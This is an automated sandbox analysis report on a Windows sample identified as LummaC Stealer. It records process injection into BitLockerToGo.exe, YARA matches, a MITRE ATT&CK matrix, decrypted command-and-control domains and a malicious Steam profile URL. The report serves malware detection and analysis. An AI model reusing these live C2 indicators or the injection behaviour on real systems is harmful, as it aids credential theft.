Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041D720	2_2_0041D720
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004347D0	2_2_004347D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041C7E0	2_2_0041C7E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004467F0	2_2_004467F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044C780	2_2_0044C780
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00412840	2_2_00412840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041B860	2_2_0041B860
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044F870	2_2_0044F870
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041D810	2_2_0041D810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00411810	2_2_00411810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042B820	2_2_0042B820
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004248C0	2_2_004248C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004348E0	2_2_004348E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043F8F0	2_2_0043F8F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00407890	2_2_00407890
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044E890	2_2_0044E890
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041C8A0	2_2_0041C8A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044D8A2	2_2_0044D8A2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040E950	2_2_0040E950
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041D950	2_2_0041D950
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041B960	2_2_0041B960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00427970	2_2_00427970
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00412900	2_2_00412900
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041C980	2_2_0041C980
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00411980	2_2_00411980
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042D980	2_2_0042D980
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043099E	2_2_0043099E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043B9A0	2_2_0043B9A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042DA40	2_2_0042DA40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040AA60	2_2_0040AA60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00412A60	2_2_00412A60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044BA60	2_2_0044BA60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040BA00	2_2_0040BA00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00424A00	2_2_00424A00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043FA00	2_2_0043FA00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042BA04	2_2_0042BA04
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041CA30	2_2_0041CA30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00446A90	2_2_00446A90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00434AB0	2_2_00434AB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00411B40	2_2_00411B40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041CB20	2_2_0041CB20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041DB20	2_2_0041DB20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043EBC0	2_2_0043EBC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042DBF0	2_2_0042DBF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00448BF0	2_2_00448BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00442BB0	2_2_00442BB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00411C10	2_2_00411C10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043BC30	2_2_0043BC30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00424CC0	2_2_00424CC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00434CC0	2_2_00434CC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043FCC0	2_2_0043FCC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041BC90	2_2_0041BC90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042DC90	2_2_0042DC90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00408C9E	2_2_00408C9E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00423CA0	2_2_00423CA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043ECA0	2_2_0043ECA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042AD40	2_2_0042AD40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042DD70	2_2_0042DD70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00423DC0	2_2_00423DC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00404DE0	2_2_00404DE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00446DE0	2_2_00446DE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041CDF0	2_2_0041CDF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043FD80	2_2_0043FD80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043ED90	2_2_0043ED90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00415D94	2_2_00415D94
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041DDA0	2_2_0041DDA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00441DA0	2_2_00441DA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042DE50	2_2_0042DE50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043FE60	2_2_0043FE60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041BE70	2_2_0041BE70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00415E7C	2_2_00415E7C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00449E10	2_2_00449E10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042AE20	2_2_0042AE20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00434E20	2_2_00434E20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00432E30	2_2_00432E30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041FEC1	2_2_0041FEC1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044CEC1	2_2_0044CEC1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040AEF0	2_2_0040AEF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00409E80	2_2_00409E80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00411E80	2_2_00411E80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040CE90	2_2_0040CE90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00406E90	2_2_00406E90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043EEA0	2_2_0043EEA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00429EB0	2_2_00429EB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00424F60	2_2_00424F60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00423F00	2_2_00423F00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00446F00	2_2_00446F00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00434F10	2_2_00434F10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00423FC0	2_2_00423FC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040CFE0	2_2_0040CFE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00449FE0	2_2_00449FE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00411FF0	2_2_00411FF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042EF80	2_2_0042EF80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043FF80	2_2_0043FF80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044CFB0	2_2_0044CFB0

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 0040EA90 appears 141 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 0040C450 appears 56 times

Source: klFMCT64RF.exe, 00000000.00000000.2066302980.0000000001958000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCRWindowsClientService.exeZ vs klFMCT64RF.exe
Source: klFMCT64RF.exe	Binary or memory string: OriginalFilenameCRWindowsClientService.exeZ vs klFMCT64RF.exe

Source: klFMCT64RF.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2259734292.0000000002BEC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@3/0@11/9

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_00429440 CoCreateInstance,

2_2_00429440

Source: klFMCT64RF.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\klFMCT64RF.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: klFMCT64RF.exe

ReversingLabs: Detection: 21%

Source: klFMCT64RF.exe	String found in binary or memory: depgithub.com/docker/docker-credential-helpersv0.8.2h1:bX3YxiGzFP5sOXWc3bTPEXdEaZSeVMrFgOr3T+zrFAo=
Source: klFMCT64RF.exe	String found in binary or memory: net/addrselect.go
Source: klFMCT64RF.exe	String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go

Source: C:\Users\user\Desktop\klFMCT64RF.exe

File read: C:\Users\user\Desktop\klFMCT64RF.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\klFMCT64RF.exe "C:\Users\user\Desktop\klFMCT64RF.exe"
Source: C:\Users\user\Desktop\klFMCT64RF.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Desktop\klFMCT64RF.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior

Source: C:\Users\user\Desktop\klFMCT64RF.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\klFMCT64RF.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\klFMCT64RF.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\klFMCT64RF.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: klFMCT64RF.exe

Static PE information: certificate valid

Source: klFMCT64RF.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: klFMCT64RF.exe

Static file information: File size 13356280 > 1048576

Source: klFMCT64RF.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x3fe000
Source: klFMCT64RF.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x81aa00

Source: klFMCT64RF.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: klFMCT64RF.exe

Static PE information: section name: .symtab

Source: C:\Users\user\Desktop\klFMCT64RF.exe

Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 1276

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: BitLockerToGo.exe, 00000002.00000002.2588464715.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365955570.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2287992372.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: klFMCT64RF.exe, 00000000.00000002.2248362157.0000000001CFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
Source: BitLockerToGo.exe, 00000002.00000002.2588464715.000000000309D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365955570.000000000309C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_0044A2A0 LdrInitializeThunk,

2_2_0044A2A0

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\klFMCT64RF.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\klFMCT64RF.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: klFMCT64RF.exe, 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: absorptioniw.site
Source: klFMCT64RF.exe, 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: mysterisop.site
Source: klFMCT64RF.exe, 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: snarlypagowo.site
Source: klFMCT64RF.exe, 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: treatynreit.site
Source: klFMCT64RF.exe, 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: chorusarorp.site
Source: klFMCT64RF.exe, 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: abnomalrkmu.site
Source: klFMCT64RF.exe, 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: soldiefieop.site
Source: klFMCT64RF.exe, 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: questionsmw.stor
Source: klFMCT64RF.exe, 00000000.00000002.2259734292.0000000002880000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: nurserrsjwuwq.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\klFMCT64RF.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2C17008	Jump to behavior
Source: C:\Users\user\Desktop\klFMCT64RF.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\klFMCT64RF.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\klFMCT64RF.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 450000	Jump to behavior
Source: C:\Users\user\Desktop\klFMCT64RF.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 453000	Jump to behavior
Source: C:\Users\user\Desktop\klFMCT64RF.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 463000	Jump to behavior

Source: C:\Users\user\Desktop\klFMCT64RF.exe

Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

Jump to behavior

Source: C:\Users\user\Desktop\klFMCT64RF.exe	Queries volume information: C:\Users\user\Desktop\klFMCT64RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\klFMCT64RF.exe	Queries volume information: C:\Windows VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\klFMCT64RF.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\klFMCT64RF.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\klFMCT64RF.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	311 Process Injection	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	311 Process Injection	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	2 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	12 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
klFMCT64RF.exe	21%	ReversingLabs

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://player.vimeo.com	0%	URL Reputation	safe
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f	0%	URL Reputation	safe
https://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://www.gstatic.cn/recaptcha/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	URL Reputation	safe
http://www.certum.pl/CPS0	0%	URL Reputation	safe
https://steam.tv/	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	0%	URL Reputation	safe
http://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://store.steampowered.com/points/shop/	0%	URL Reputation	safe
https://lv.queniujq.cn	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
https://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	0%	URL Reputation	safe
https://checkout.steampowered.com/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	0%	URL Reputation	safe
https://store.steampowered.com/;	0%	URL Reputation	safe
https://store.steampowered.com/about/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	0%	URL Reputation	safe
https://help.steampowered.com/en/	0%	URL Reputation	safe
https://store.steampowered.com/news/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/	0%	URL Reputation	safe
http://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	0%	URL Reputation	safe
https://recaptcha.net/recaptcha/;	0%	URL Reputation	safe
